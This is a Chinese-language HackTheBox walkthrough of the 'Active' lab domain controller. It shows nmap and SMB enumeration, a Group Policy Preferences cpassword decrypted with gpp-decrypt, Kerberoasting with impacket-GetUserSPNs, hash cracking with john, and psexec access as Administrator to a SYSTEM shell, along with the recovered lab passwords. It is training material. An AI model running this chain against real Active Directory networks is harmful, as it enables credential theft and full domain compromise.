打靶记录(一二六)之HTBActive

端口扫描

┌──(mikannse㉿kali)-[~/HTB/active]
└─$ sudo nmap --min-rate=10000 -p- 10.10.10.100 >nmap_result

┌──(mikannse㉿kali)-[~/HTB/active]
└─$ cat nmap_result|grep open |awk -F'/' '{print $1}' |tr '\n\r' ','
53,88,135,139,389,445,464,593,636,3268,3269,5722,9389,47001,49152,49153,49154,49155,49157,49158,49165,49166,49167,                                                                                                     
┌──(mikannse㉿kali)-[~/HTB/active]
└─$ sudo nmap -sT -sV -sC -O -p53,88,135,139,389,445,464,593,636,3268,3269,5722,9389,47001,49152,49153,49154,49155,49157,49158,49165,49166,49167 10.10.10.100
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-03 16:51 CST
Nmap scan report for 10.10.10.100
Host is up (0.15s latency).

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid: 
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-09-03 08:41:44Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5722/tcp  open  msrpc         Microsoft Windows RPC
9389/tcp  open  mc-nmf        .NET Message Framing
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49152/tcp open  msrpc         Microsoft Windows RPC
49153/tcp open  msrpc         Microsoft Windows RPC
49154/tcp open  msrpc         Microsoft Windows RPC
49155/tcp open  msrpc         Microsoft Windows RPC
49157/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49158/tcp open  msrpc         Microsoft Windows RPC
49165/tcp open  msrpc         Microsoft Windows RPC
49166/tcp open  msrpc         Microsoft Windows RPC
49167/tcp open  msrpc         Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Microsoft Windows 7 or Windows Server 2008 R2 (97%), Microsoft Windows Home Server 2011 (Windows Server 2008 R2) (96%), Microsoft Windows Server 2008 SP1 (96%), Microsoft Windows 7 (96%), Microsoft Windows 7 SP0 - SP1 or Windows Server 2008 (96%), Microsoft Windows 7 SP0 - SP1, Windows Server 2008 SP1, Windows Server 2008 R2, Windows 8, or Windows 8.1 Update 1 (96%), Microsoft Windows 7 SP1 (96%), Microsoft Windows 7 Ultimate (96%), Microsoft Windows 8.1 (96%), Microsoft Windows Vista or Windows 7 SP1 (96%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows

Host script results:
|_clock-skew: -10m00s
| smb2-time: 
|   date: 2024-09-03T08:42:48
|_  start_date: 2024-09-03T08:31:52
| smb2-security-mode: 
|   2:1:0: 
|_    Message signing enabled and required

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 82.88 seconds

添加active.htb到hosts,是一台DC，那就从SMB入手

SMB

┌──(mikannse㉿kali)-[~/HTB/active]
└─$ smbmap -H active.htb     

    ________  ___      ___  _______   ___      ___       __         _______
   /"       )|"  \    /"  ||   _  "\ |"  \    /"  |     /""\       |   __ "\
  (:   \___/  \   \  //   |(. |_)  :) \   \  //   |    /    \      (. |__) :)
   \___  \    /\  \/.    ||:     \/   /\   \/.    |   /' /\  \     |:  ____/
    __/  \   |: \.        |(|  _  \  |: \.        |  //  __'  \    (|  /
   /" \   :) |.  \    /:  ||: |_)  :)|.  \    /:  | /   /  \   \  /|__/ \
  (_______/  |___|\__/|___|(_______/ |___|\__/|___|(___/    \___)(_______)
-----------------------------------------------------------------------------
SMBMap - Samba Share Enumerator v1.10.4 | Shawn Evans - ShawnDEvans@gmail.com<mailto:ShawnDEvans@gmail.com>
                     https://github.com/ShawnDEvans/smbmap

[\] Checking for open ports...                                                                       [|] Checking for open ports...                                                                       [/] Checking for open ports...                                                                       [*] Detected 1 hosts serving SMB
[-] Initializing hosts...                                                                                           <snip>                       
[+] IP: 10.10.10.100:445        Name: active.htb                Status: Authenticated
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        C$                                                      NO ACCESS       Default share
        IPC$                                                    NO ACCESS       Remote IPC
        NETLOGON                                                NO ACCESS       Logon server share 
        Replication                                             READ ONLY
        SYSVOL                                                  NO ACCESS       Logon server share 
        Users                                                   NO ACCESS
[-] Closing connections..                                                               

有一个Replication共享是可读的递归把这个目录下载下来

┌──(mikannse㉿kali)-[~/HTB/active]
└─$ smbclient //active.htb/Replication
Password for [WORKGROUP\mikannse]:
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Sat Jul 21 18:37:44 2018
  ..                                  D        0  Sat Jul 21 18:37:44 2018
  active.htb                          D        0  Sat Jul 21 18:37:44 2018

                5217023 blocks of size 4096. 283777 blocks available
smb: \> recurse on
smb: \> prompt off
smb: \> mget active.htb

┌──(mikannse㉿kali)-[~/HTB/active]
└─$ tree active.htb                        
active.htb
├── DfsrPrivate
│   ├── ConflictAndDeleted
│   ├── Deleted
│   └── Installing
├── Policies
│   ├── {31B2F340-016D-11D2-945F-00C04FB984F9}
│   │   ├── GPT.INI
│   │   ├── Group Policy
│   │   │   └── GPE.INI
│   │   ├── MACHINE
│   │   │   ├── Microsoft
│   │   │   │   └── Windows NT
│   │   │   │       └── SecEdit
│   │   │   │           └── GptTmpl.inf
│   │   │   ├── Preferences
│   │   │   │   └── Groups
│   │   │   │       └── Groups.xml
│   │   │   └── Registry.pol
│   │   └── USER
│   └── {6AC1786C-016F-11D2-945F-00C04fB984F9}
│       ├── GPT.INI
│       ├── MACHINE
│       │   └── Microsoft
│       │       └── Windows NT
│       │           └── SecEdit
│       │               └── GptTmpl.inf
│       └── USER
└── scripts

22 directories, 7 files

比较感兴趣的是这个Groups.xml

<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User>
</Groups>

是一个SVC_TGS用户的加密后的cpassword，并且是静态加密

┌──(mikannse㉿kali)-[~/HTB/active]
└─$ gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ
GPPstillStandingStrong2k18

而且似乎没有写共享的权限无法拿到shell

┌──(mikannse㉿kali)-[~/HTB/active]
└─$ impacket-psexec active/SVC_TGS:GPPstillStandingStrong2k18@active.htb
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Requesting shares on active.htb.....
[-] share 'ADMIN$' is not writable.
[-] share 'C$' is not writable.
[-] share 'NETLOGON' is not writable.
[-] share 'Replication' is not writable.
[-] share 'SYSVOL' is not writable.
[-] share 'Users' is not writable.

那只好继续看SMB共享，新的用户也许有更多的权限

┌──(mikannse㉿kali)-[~/HTB/active]
└─$ smbmap -d active.htb -u SVC_TGS -p GPPstillStandingStrong2k18 -H 10.10.10.100

    ________  ___      ___  _______   ___      ___       __         _______
   /"       )|"  \    /"  ||   _  "\ |"  \    /"  |     /""\       |   __ "\
  (:   \___/  \   \  //   |(. |_)  :) \   \  //   |    /    \      (. |__) :)
   \___  \    /\  \/.    ||:     \/   /\   \/.    |   /' /\  \     |:  ____/
    __/  \   |: \.        |(|  _  \  |: \.        |  //  __'  \    (|  /
   /" \   :) |.  \    /:  ||: |_)  :)|.  \    /:  | /   /  \   \  /|__/ \
  (_______/  |___|\__/|___|(_______/ |___|\__/|___|(___/    \___)(_______)
-----------------------------------------------------------------------------
SMBMap - Samba Share Enumerator v1.10.4 | Shawn Evans - ShawnDEvans@gmail.com<mailto:ShawnDEvans@gmail.com>
                     https://github.com/ShawnDEvans/smbmap

[\] Checking for open ports...                                                                       [|] Checking for open ports...                                                                       [*] Detected 1 hosts serving SMB
[/] Authenticating...                                                                                [-] Authenticating...                                                                                [\] Authenticating...                                                                                [|] Authenticating...                                                                                [/] Authenticating...                                                                                [-] Authenticating...                                                                                [*] Established 1 SMB connections(s) and 1 authenticated session(s)
<SNIP>                                                                                                                                                                              
[+] IP: 10.10.10.100:445        Name: active.htb                Status: Authenticated
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        C$                                                      NO ACCESS       Default share
        IPC$                                                    NO ACCESS       Remote IPC
        NETLOGON                                                READ ONLY       Logon server share 
        Replication                                             READ ONLY
        SYSVOL                                                  READ ONLY       Logon server share 
        Users                                                   READ ONLY
[|] Closing connections..                                                                            [/] Closing connections..                                                                            [-] Closing connections..                                                                            [\] Closing connections..                                                                            [|] Closing connections..                                                                            [/] Closing connections..                                                                            [-] Closing connections..                                                                            [*] Closed 1 connections 

连上Users共享，在桌面找到用户flag

提权

尝试GetUserSPN，不过又遇到了时钟问题,禁用网络协议自动更新解决!

┌──(mikannse㉿kali)-[~/HTB/active]
└─$ sudo timedatectl set-ntp off                                                      
                                                                                                     
┌──(mikannse㉿kali)-[~/HTB/active]
└─$ sudo rdate -n active.htb     
Tue Sep  3 21:51:02 CST 2024

┌──(mikannse㉿kali)-[~/HTB/active]
└─$ sudo /usr/bin/impacket-GetUserSPNs -dc-ip 10.10.10.100 active.htb/svc_tgs -request
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

Password:
ServicePrincipalName  Name           MemberOf                                                  PasswordLastSet             LastLogon                   Delegation 
--------------------  -------------  --------------------------------------------------------  --------------------------  --------------------------  ----------
active/CIFS:445       Administrator  CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb  2018-07-19 03:06:40.351723  2024-09-03 16:33:04.699358             
<SNIP>

保存成hash

┌──(mikannse㉿kali)-[~/HTB/active]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt hash
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Ticketmaster1968 (?)     
1g 0:00:00:04 DONE (2024-09-03 22:03) 0.2325g/s 2450Kp/s 2450Kc/s 2450KC/s Tiffani143..Thrall
Use the "--show" option to display all of the cracked passwords reliably
Session completed. Ticketmaster1968

爆破得到，是admin的密码

┌──(mikannse㉿kali)-[~/HTB/active]
└─$ psexec.py active.htb/administrator:Ticketmaster1968@10.10.10.100
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Requesting shares on 10.10.10.100.....
[*] Found writable share ADMIN$
[*] Uploading file LPJXoeZj.exe
[*] Opening SVCManager on 10.10.10.100.....
[*] Creating service mJGI on 10.10.10.100.....
[*] Starting service mJGI.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32> whoami  
nt authority\system

碎碎念

其实都是碰到过的东西内容也就是SMB加GetUserSPN的组合拳打来打去，但是对域的组成部分仍然不是很熟，也许得自己配一配域环境比较好

另外贴上有关SYSVOL的内容: https://vk9-sec.com/exploiting-gpp-sysvol-groups-xml/